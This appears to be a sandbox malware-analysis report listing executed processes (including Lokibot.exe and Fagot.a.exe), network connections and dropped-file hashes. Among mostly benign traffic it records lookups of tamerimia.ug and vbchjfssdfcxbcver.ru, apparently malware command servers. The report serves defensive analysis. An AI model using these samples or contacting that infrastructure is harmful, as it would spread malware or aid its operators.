C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5200 -ip 5200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 400
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1540 -childID 19 -isForBrowser -prefsHandle 1456 -prefMapHandle 2748 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba015992-3bd2-48c4-abb9-9f8bed97d948} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\BabylonClient12.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding EAE59F16C7B87FAC329C0C1BC8195756 C
C:\Users\Admin\Downloads\Fagot.a.exe
"C:\Users\Admin\Downloads\Fagot.a.exe"
Network
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.com | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.178.14:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 172.217.169.3:443 | recaptcha.net | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| GB | 172.217.169.3:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | ra.majorgeeks.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| GB | 142.250.187.238:443 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 51.81.2.252:443 | api.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| US | 51.81.2.245:443 | www.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | 2.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 51.81.2.248:443 | ra.majorgeeks.com | tcp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| GB | 142.250.178.14:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| GB | 108.138.217.119:443 | platform-api.sharethis.com | tcp |
| FR | 157.240.196.15:443 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | buttons-config.sharethis.com | udp |
| US | 8.8.8.8:53 | l.sharethis.com | udp |
| IE | 54.247.106.76:443 | l.sharethis.com | tcp |
| US | 8.8.8.8:53 | httplogserver-lb.global.unified-prod.sharethis.net | udp |
| GB | 18.245.143.111:443 | buttons-config.sharethis.com | tcp |
| US | 8.8.8.8:53 | d2znr2yi078d75.cloudfront.net | udp |
| US | 8.8.8.8:53 | httplogserver-lb.global.unified-prod.sharethis.net | udp |
| US | 8.8.8.8:53 | d2znr2yi078d75.cloudfront.net | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 172.217.169.14:443 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| GB | 163.70.147.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.196.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.106.247.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| US | 8.8.8.8:53 | api.majorgeeks.com | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| GB | 172.217.169.14:443 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 18.154.84.47:443 | count-server.sharethis.com | tcp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 142.250.200.2:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | cse.google.com | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| GB | 142.250.178.14:443 | cse.google.com | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | 22.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 142.250.178.14:443 | cse.google.com | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | vbchjfssdfcxbcver.ru | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| GB | 172.217.169.3:443 | recaptcha.net | udp |
| GB | 172.217.169.3:443 | recaptcha.net | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | vbchjfssdfcxbcver.ru | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | vbchjfssdfcxbcver.ru | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | www.babylon-software.com | udp |
| US | 174.138.88.129:443 | www.babylon-software.com | tcp |
| US | 174.138.88.129:443 | www.babylon-software.com | tcp |
| US | 8.8.8.8:53 | www-new.babylon-software.com | udp |
| US | 8.8.8.8:53 | www-new.babylon-software.com | udp |
| US | 8.8.8.8:53 | 129.88.138.174.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge.marker.io | udp |
| US | 104.26.15.104:443 | edge.marker.io | tcp |
| US | 8.8.8.8:53 | edge.marker.io | udp |
| US | 8.8.8.8:53 | edge.marker.io | udp |
| US | 104.26.15.104:443 | edge.marker.io | udp |
| US | 8.8.8.8:53 | s.w.org | udp |
| US | 192.0.77.48:443 | s.w.org | tcp |
| US | 8.8.8.8:53 | s.w.org | udp |
| US | 8.8.8.8:53 | s.w.org | udp |
| US | 192.0.77.48:443 | s.w.org | udp |
| US | 8.8.8.8:53 | 104.15.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.77.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | api.marker.io | udp |
| US | 104.26.15.104:443 | api.marker.io | tcp |
| US | 104.26.15.104:443 | api.marker.io | tcp |
| US | 8.8.8.8:53 | api.marker.io | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | api.marker.io | udp |
| US | 104.26.15.104:443 | api.marker.io | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 174.138.88.129:443 | www-new.babylon-software.com | tcp |
| US | 104.26.15.104:443 | api.marker.io | tcp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 174.138.88.129:443 | www-new.babylon-software.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | vbchjfssdfcxbcver.ru | udp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
Files
| SHA512 | c8d55a2c10a2ef484dedded911b8f3c2f5ecb996be6f6f425c5bd4b4f53eb620a2baccd48bac1915a81da9a792971d95ff36c3f216075d93e5fd7a462ecd784f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | f642bb5b973829d90b217c852e900ca8 |
| SHA1 | dd56c986bdd1d6f5b1cb4a18de1997caf57c560f |
| SHA256 | d126f738f152bf880aa7b81223bb36ac87fc35e15c32c47d83992314bd8f3ecf |
| SHA512 | 3b2bee3ef0213cfc8a21114ab47c3b588bc214a093f7ec30ee07031efa03e82090cd698f98c60afb8c4f5a79c854a885a092654d23499c868cda2241fb86cd0a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | b9e52dfece106e6b0d81eb0c1f5c1d2c |
| SHA1 | 34fbcd14ae83b0f4b63c35d038b68735e2cd1b5a |
| SHA256 | 39ff741adcdb974db9b2cd76b3719d88010e367a9b26a9bbbb383d2f75138a8c |
| SHA512 | d211fc325143c7958ec6798a8ffe697f0e962f53c8895472453f381e0c3663d33b36b558a4b3599eac89d4918ef6613353ace7ea32ac4325f8687402a52cbd47 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\2947b088-2e5f-4ea5-93a7-7978ed93975d
| MD5 | 0b3f73f46b8fc71fde9bcc16b5dfb820 |
| SHA1 | 9154a3c7a519774dd21ed23c4077aeb28b3d175a |
| SHA256 | 3e9d8c44f66dcc8e95d59768f4b2c4df0c1d62d21ac79ae89a48ef9a316b9f03 |
| SHA512 | ef794cb7cb1d6312908eb0cd5946e3fd3162bbed589b091b6dd92191a03e3a217376f4d61e74d2e362f5aa5ddbf8be5233bd6dbab09d362d6d5b543314d57a03 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\20S9BD1SOIUWJ2MFGIJF.temp
| MD5 | 4c5325eb3a6679252027c5d375b61bab |
| SHA1 | a7cfb41ecd666a4fd9103ca837530b1ca914c5c5 |
| SHA256 | 14fa0f659ca52eb32214bad4a10b1e92c8315ebe5fbf0bd9ad8512a7e4cc20db |
| SHA512 | 025a31ebb211fb501722df179ab72686431091ef3d1292981da4822203391a1c7735a5c6f1f0b8c4dd018fa27abda2c8f01df4f982c809fe7326882516136215 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | e9dfcf63493773d99e736b952c40b283 |
| SHA1 | b27cff30f6b711cbcacddaeb61ed1fff6dfc04ae |
| SHA256 | ae6d5a444b4538799f2bcb7d96012a31ad74fc12ef08e0a5cb7d033fa068ff12 |
| SHA512 | df8ac869eb51c2fbf6e843e63a84a3dfedb62aeb28c1e8baa3cc241f1749512d7c4298dc5747c417dfa50ea0e63978db6a78410bdaccaa6e3f77524b121973bd |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\AF6E7B7DB9908D7B867517AC33D094ABD56E38F7
| MD5 | de80ecf8975bdb3fb4cf3cfb69f9567d |
| SHA1 | af9b20d84a2d80f326b9511d6ebedd5557d88384 |
| SHA256 | 65ed782c670c6936204a3b24f3f9e18b87032932a9e9150ef585babfc763e5c4 |
| SHA512 | e674f9c3de4bbf8606bb34cdc8e03a9983226e576a3c069296483c5f426d0b6350e0803377603de5e2ad869d2e1068601b1855776f4b57ed30f9b3fd3a38ed97 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\6DA69A746F9687E1FF413119EDE7AAED2F9783B9
| MD5 | 43940c8e9e6163cad86eef7746c9192c |
| SHA1 | 40c750b31c351fef5abb85df409dbd6b4d108263 |
| SHA256 | 6ad7cb998a23ecc311ca0d324b57c9d44aebbf97d56e8e80ccaae7edb23b2933 |
| SHA512 | 3765e870879f562d74ccc7c8f900976b07a6ab7c6a76346f935d214c171951843245ea49c780d790a8d51b9b9affbc0bba414e1fb1145b4ad10a5e425a98db57 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\2492994A253B970917AF5CDF605580B1C2DC16A0
| MD5 | 331b4c1fde8d0fb8e19c214f7c474123 |
| SHA1 | 56115ba7165959e34a4fe359997a7dfc268c2325 |
| SHA256 | 27f2b2c010a94f141160b55f1af6f54bde4d0b8bb0d233cbc37d35295fee4c48 |
| SHA512 | b501c8097b819516897150f599e8557e17009d050a429af07b41da6f2e04d0823108b21d6b43b16d4ea861079e6962181f349265581fcc079dc7252710222446 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\E6C22A3DFCD18E3C6145370266896FF76AE3F7EC
| MD5 | 4d0439fe1b1650731fdd6b09eb2450af |
| SHA1 | bd2fa3682fbf633bf7badbb898ccdaecbcc5bb5e |
| SHA256 | a6b3001a8f48b37236414f1b5ef99960884b0727b9e56f9e8efeba084952ee3b |
| SHA512 | 233e7894ad7e319eb190c9620577f48cb42513ac2d67380b6bdec6e17471824fe80bfca3876d45ef62faec0df7b2e65f825d83d62b11304c12e5a4e7af755a74 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\3B5769283C179770F2CAA780FDC2929B4B9E5038
| MD5 | c521d9f4da86923a2930a3dbc929395e |
| SHA1 | dc067da5a4570dae14a6fd1b1151ea155ad21d21 |
| SHA256 | 4365975fdd273fdf920930887415b80949a0796818b7743401d372458dfa03f3 |
| SHA512 | f19ea4ea26e809aaa7691b138069ad73e630aa6caa510b1d17f9ef14b6f9b96f7d802840ca98b6a1fd2602ebbcc4272649fde4898c291206cda78ef5879a28e7 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\878D57D194D36A5530D4BB67461357E393C85A3D
| MD5 | 9c1db5ffce137e917bfcca5b15d4aea3 |
| SHA1 | b26a263a6f4448b28a6946878b07718388296706 |
| SHA256 | 81dadb6e6518ed5d970c3d85e676cbac491151542d38484c3d0fefa0cd45cb52 |
| SHA512 | 8db3141056796361305d0852b1ba00e9d2de820d45269d1eb3f76270dec358b92e1e1589664d8389becf6343d63de0c242a686566f34cb09bb376d3f894b5870 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\572F0ED336AE2650801061B8F31BB2D7362D6B9E
| MD5 | 6cc008b8347ebb29db965d3caf05abba |
| SHA1 | e0983a93aec94b513068b9e97daf63da8b98a56a |
| SHA256 | eba23a44a3099d2a96f7e9483253378ed56312c417026791409154f13e9c67a2 |
| SHA512 | 7fecda9ae065f8d71812d36a665f384303d601f31dc0f3cd68f9797c99ac65ed159b92a069a10016b66e38e559da46c14285bf7f751dc797529dacf853e25b4d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\A6C74BC2260EAFF823C7AED38BBA607C962CCB55
| MD5 | 3bf2d51587eb353a2154a93a8e1e42da |
| SHA1 | d93877f96537284f234b24b1d4e228bece546664 |
| SHA256 | 2ed994072dfe3a1ed14747ac94c9b4fef43553e495f79d401e8c83505f177962 |
| SHA512 | 4cb3e3444a4cb1e48ae20e71e0280045ce9956333fb8fd33cc826127926d81f6abe815b90e5fc092e717353bd25d47372e4f65dea149c822b423c305b5489a46 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\E2E8122A6253CFFA077D0D33D689966608450980
| MD5 | 00ee0c4b9592518f57ddf7fe370541b5 |
| SHA1 | 11313e4b565022978759980156c024d1e73f08e8 |
| SHA256 | 09057cedcecdae0d15ee4b230b5629c8ca2ab39a1f15633dd10e6431e3c92373 |
| SHA512 | 47fb5cf67292d0a94c9c649e6e28e43807c121ae8efa25dae2f2218e8fe1ca6a43f3ad0bec7bbc5c3ce3d6ad1195ff90ab6d9828ec1ee502ea43696f6ea227e2 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\C3C1B73261AC1D76E896892B7C9776351D4E38E4
| MD5 | d626393f4e11c83b63101d13b367b782 |
| SHA1 | 9836b4cd8e7b2f39875d18a3ea709e6c2891fc7c |
| SHA256 | 53cfd6ac067e68ee38738a21b5e283df1201722ea604b0d89a5ce12e6352ee05 |
| SHA512 | 6bbdd9ade5a3e92352458457073ae4e6245ce4880043e7db8d431463cf1de4f51411f765e026a64e1cf9c11c16c26e980220caf1a9910fc3c2629b1631ca4357 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\4CA2E679CEC293F142684E37B6B4D5F01FB00E81
| MD5 | cc302fda65dcf417d2da68ef23d5fba1 |
| SHA1 | 1f065c15573e8a44c122c9ef1eda7c2613bce79f |
| SHA256 | ddb8afab9cf4edc242f1a556bc3d65994ea2c7683008273bdb0ee7e1bbe6d1ea |
| SHA512 | b6adbde19e0c33efd962a0f731bd4127e93e229612b423c33aa7b76f1c45b49ae58bc28fc041d39edc562af4b93984e588d5a8d5d2b16cafea952632ae41c89c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\A7BFD7F859FEEF756C6ADAE32A931308CD5C619D
| MD5 | 250ca30074d74e72b9e997eec9b0c2c0 |
| SHA1 | 9cafd2254a6f9e6a4479ee6c00aa1d7667bc27f4 |
| SHA256 | e39864ee56dbf02bfa22a35d0e3f45cb5058c0fad1ff3b725cd651f0b9d2f711 |
| SHA512 | b8c57dab8e953032b1a54b955882350f1d344358b00e38a94af2f755c43aafe396508cf729b09fc3265bec77d42744383edb55521bf4d4a2a79a34441c9db227 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 8626ef191073380e181f86b1017ff83c |
| SHA1 | fab8cd0fbb60af9028e93190df68304c59332eb5 |
